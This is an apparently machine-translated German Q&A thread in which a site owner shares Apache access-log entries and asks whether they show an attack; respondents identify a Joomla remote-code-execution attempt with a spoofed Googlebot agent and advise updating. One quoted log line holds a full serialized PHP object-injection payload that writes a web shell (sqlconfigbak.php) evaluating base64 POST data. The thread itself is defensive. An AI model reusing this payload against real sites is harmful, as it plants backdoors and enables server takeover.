it-swarm.com.de

Wurde die Benutzeragentenidentifikation für eine Skriptangriffstechnik verwendet?

Die Apache-Zugriffsprotokolleinträge auf meiner Site lauten normalerweise wie folgt:

207.46.13.174 - - [31/Oct/2016: 10: 18: 55 +0100] GET/contact HTTP/1.1 200 256 - Mozilla/5.0 (kompatibel; Bingbot/2.0; + http: // www .bing.com/bingbot.htm) 0,607 MISS 10.10.36.125:104 0,607 

sie können dort also das Benutzeragentenfeld sehen. Aber heute habe ich auch ein User-Agent-Feld gefunden, das so verwendet wird:

62.210.162.42 - - [31/Oct/2016: 11: 24: 19 +0100] "GET/HTTP/1.1" 200 399 "-"} __ test | O: 21: "JDatabaseDriverMysqli": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0\0\0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = |\x3C" .chr (63). "php\x24mujj =\x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @eval (\\\\ x24safedg =\x24xsser; \);}); JFactory :: getConfig (); exit; s: 19: cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:" JDatabaseDriverMysql ": 0: {}} i: 1; s: 4: "init";}} s: 13: "\ 0\0\0connection"; b: 1;} ~ Ů "0,304 BYPASS 10.10.36.125:104 0,304 

War das ein Angriff? Der nächste Protokolleintrag hat anscheinend die im Skript erwähnte Datei sqlconfigbak.php erfolgreich abgerufen (Code 200). Obwohl ich die Datei im Dateisystem nicht finden kann:

62.210.162.42 - - [31/Oct/2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (kompatibel; Googlebot/2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Bitte, was war hier los?

10
miroxlav

Dies ist ein Joomla 0 Day Attack. Informationen finden Sie hier: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

Dies ist trotz __test kein Schwachstellentest. Es ist ein Angriff.

Stellen Sie sicher, dass alle Joomla-Installationen so aktuell wie möglich sind.

Eine andere Möglichkeit ist, einfach .htaccess zu verwenden, um diesen Exploit abzufangen, indem Sie nach einer gemeinsamen Zeichenfolge suchen. "__Test" würde funktionieren und an eine andere Stelle umleiten.

11
closetnoc

Die von Ihnen verknüpfte IP-Adresse wird nicht in einen Google-Hostnamen aufgelöst, daher handelt es sich nicht um Google. Die Person oder der Bot scannt Ihre Website auf Sicherheitslücken. Der erste ist der Versuch, eine Joomla-Schwachstelle zu finden.

Diese Ereignisse treten auf den meisten Websites regelmäßig auf. Sie sollten sicherstellen, dass Sie bewährte Methoden befolgen und Ihre Website verbessern. Der Prozess ist lang und Sie müssen ein Online-Lernprogramm suchen und befolgen.

4
Simon Hayter

Beachten Sie zusätzlich zu anderen Antworten, dass die Tatsache, dass dieser Angriff anscheinend funktioniert hat, darauf hindeutet, dass Sie eine alte, unsichere Version von PHP verwenden. Ein Update für den Fehler, den dieser Angriff ausnutzt, wurde im September 2015 veröffentlicht. Führen Sie Ihren Update-Prozess aus und stellen Sie sicher, dass die neueste Version von PHP installiert ist. Suchen Sie auch nach anderen veralteten Programmen, die mit dem Internet in Verbindung stehen, da Ihr Server anscheinend seit mindestens einem Jahr nicht mehr auf dem neuesten Stand ist.

2
Periata Breatta